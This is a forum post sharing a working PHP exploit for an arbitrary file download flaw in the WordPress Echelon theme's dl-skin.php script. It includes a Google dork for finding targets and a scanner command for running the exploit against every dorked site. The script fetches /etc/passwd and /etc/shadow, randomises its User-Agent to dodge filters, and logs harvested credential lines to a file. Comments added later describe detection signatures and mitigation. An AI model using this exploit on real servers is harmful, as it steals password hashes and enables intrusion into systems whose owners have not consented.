Aerosol Posted December 17, 2014 Report Posted December 17, 2014
*Name:*Wordpress A.F.D Theme Echelon / INURL - BRASIL
*Description:*This exploit allows attacker to download any writable file from the server
*Usage info:*Put the path of the file in the file's field of the exploit ,then click"Download" button then you get the file directly
File download /etc/passwd & /etc/shadow
Failure consists of exploring a parameter $ _POST file
/wp-content/themes/echelon/lib/scripts/dl-skin.php
The following fields are exploited for Arbitrary File Download
*POST:*_mysite_download_skin={$config['file']}&submit=Download
ex:_mysite_download_skin=/etc/passwd&submit=Download
*Exploit:*
<?php
#===============================================================================
# NAME: Wordpress A.F.D Theme Echelon
# TIPE: Arbitrary File Download
# Google DORK: inurl:/wp-content/themes/echelon
# Vendor: www.wordpress.org
# Tested on: Linux
# EXECUTE: php exploit.php www.alvo.com.br
# OUTPUT: EXPLOIT_WPAFD_Echelon.txt
# AUTOR: Cleiton Pinheiro
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# GIT: https://github.com/googleinurl
# YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#
#------------------------------------------------------------------------------
# Comand Exec Scanner INURLBR:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -ssave.txt --comand-all "php exploit.php _TARGET_"
#------------------------------------------------------------------------------
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#===============================================================================
#
# Review notes (defender's view of what this script demonstrates):
#
# The weakness is in the Echelon theme's helper
# /wp-content/themes/echelon/lib/scripts/dl-skin.php, which serves the file
# named by the POST field `_mysite_download_skin` without restricting it to
# the theme's own skin files. This script POSTs that field with the values
# '/etc/passwd' and '/etc/shadow' and treats the host as vulnerable when the
# raw response contains the substring "root".
#
# Detection: an HTTP POST to the dl-skin.php path whose `_mysite_download_skin`
# value is an absolute path or contains traversal is the signature to key on.
# The User-Agent below is rebuilt from rand() on every request, so UA-based
# rules are unreliable; match on the URL path and the POST parameter instead.
# A response carrying a Content-Disposition header for a file outside the
# theme directory confirms the download succeeded.
#
# Mitigation: remove or update the theme so dl-skin.php only serves files
# from an allow-list under the theme's skin directory (resolve the path and
# verify its prefix), or block the script path at the web server.
#===============================================================================

# Runtime setup: long-running, no time limit, output flushed as it is produced.
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

# The single CLI argument is the target host; it is prefixed with "http://"
# when it does not already contain "http", then the host part is extracted
# into $alvo_ (Portuguese "alvo" = target).
print empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL / Execute: phpexploit.php www.alvo.com.br') : NULL;
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
!(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i",$argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.phpwww.alvo.com.br') : NULL;

# $config is a plain array shared with every function below:
#   'line'    - separator printed around result blocks
#   'alvo'    - target base URL as matched above
#   'exploit' - path of the vulnerable theme script
#   'file'    - server-side path requested via _mysite_download_skin (set later)
$config['line'] ="\n------------------------------------------------------------------------------------------------------------------\n";
$config['alvo'] = $alvo_[0][0];
$config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";

# Flushes both the output buffer and the SAPI buffer so progress shows immediately.
function __plus() {
    ob_flush();
    flush();
}

# Splits a "k=v&k2=v2" query string into an array of key => urlencoded value.
# Each segment is split on the first '=' only via explode(), and the value
# part is passed through urlencode().
function __convertUrlQuery($query) {
    $queryParts = explode('&', $query);
    $params = array();
    foreach ($queryParts as $param) {
        $item = explode('=', $param);
        $params[$item[0]] = urlencode($item[1]);
    }
    return $params;
}

# Sends one POST of "_mysite_download_skin=<file>&submit=Download" to
# $config['alvo'] . $config['exploit'] over the given cURL handle.
#
# Parameters:
#   $curl   - cURL handle from curl_init(); closed before returning
#   $config - see the $config description above; 'file' is the requested path
#
# Returns array('corpo' => raw response including headers (CURLOPT_HEADER=1),
#               'server' => curl_getinfo() array,
#               'info'   => status line, Server and Content-Disposition headers
#                           joined on one line) or FALSE if $corpo is unset.
function __request_info($curl, $config) {
    $postDados =__convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
    foreach ($postDados as $campo => $valor) {
        $postDados_format .= $campo . '=' . ($valor) . '&';
    }
    $postDados_format = rtrim($postDados_format, '&');
    curl_setopt($curl, CURLOPT_POST, count($postDados));
    curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
    curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
    # User-Agent is assembled from rand() values on every call (see review
    # notes at the top: do not rely on it as a detection signature).
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'. rand(1, 500) . '.31');
    curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .$config['exploit']);
    # TLS host-name verification is disabled for the request.
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($curl, CURLOPT_HEADER, 1);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $corpo = curl_exec($curl);
    $server = curl_getinfo($curl);
    $status = NULL;
    # Headers are part of $corpo because CURLOPT_HEADER is set; pick the
    # status line, Server and Content-Disposition out of the raw text.
    preg_match_all('(HTTP.*)', $corpo, $status['http']);
    preg_match_all('(Server:.*)', $corpo, $status['server']);
    preg_match_all('(Content-Disposition:.*)', $corpo,$status['Content-Disposition']);
    $info = str_replace("\r", '', str_replace("\n", '',"{$status['http'][0][0]}, {$status['server'][0][0]}{$status['Content-Disposition'][0][0]}"));
    curl_close($curl);
    unset($curl);
    return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,'info' => $info) : FALSE;
}

# Inspects one response and reports/records the result.
#
# Parameters:
#   $config - shared config; 'file' names the path that was requested
#   $rest   - array returned by __request_info() (its 'corpo' is inspected)
#
# Collects lines starting with root:, sbin:, ftp:, nobody: or mail: from the
# raw response. The vulnerable/not-vulnerable decision is only whether the
# substring "root" (case-insensitive) appears anywhere in the raw response,
# headers included. On a hit the collected lines are appended to
# EXPLOIT_WPAFD_Echelon.txt together with the target; otherwise "[NOT VULN]"
# is printed. Output goes to stdout via print.
function main($config,$rest) {
    __plus();
    print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:{$config['file']}:\n";
    preg_match_all("(root:.*)", $rest['corpo'], $final);
    preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
    preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
    preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
    preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
    $_final = array_merge($final[0], $final__[0], $final___[0],$final____[0], $final_____[0]);
    $res = NULL;
    if (preg_match("#root#i", $rest['corpo'])) {
        $res.= "0x " . date("h:m:s") . " [INFO][ISVULN][RESUME][VALUES]:\n";
        $res.=$config['line'] . "\n";
        foreach ($_final as $value) {
            $res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
        }
        $res.=$config['line'];
        __plus();
        file_put_contents('EXPLOIT_WPAFD_Echelon.txt',"{$config['alvo']}\n{$res}\n", FILE_APPEND);
        print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
    } else {
        print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
    }
}

# Entry sequence: two requests against the same target, first for
# /etc/passwd, then for /etc/shadow, each followed by main() on its response.
print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL -BRASIL\n";
$config['file'] = '/etc/passwd';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
print $line;
print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
main($config,$rest);
__plus();
$config['file'] = '/etc/shadow';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
main($config,$rest);
__plus();
Source Quote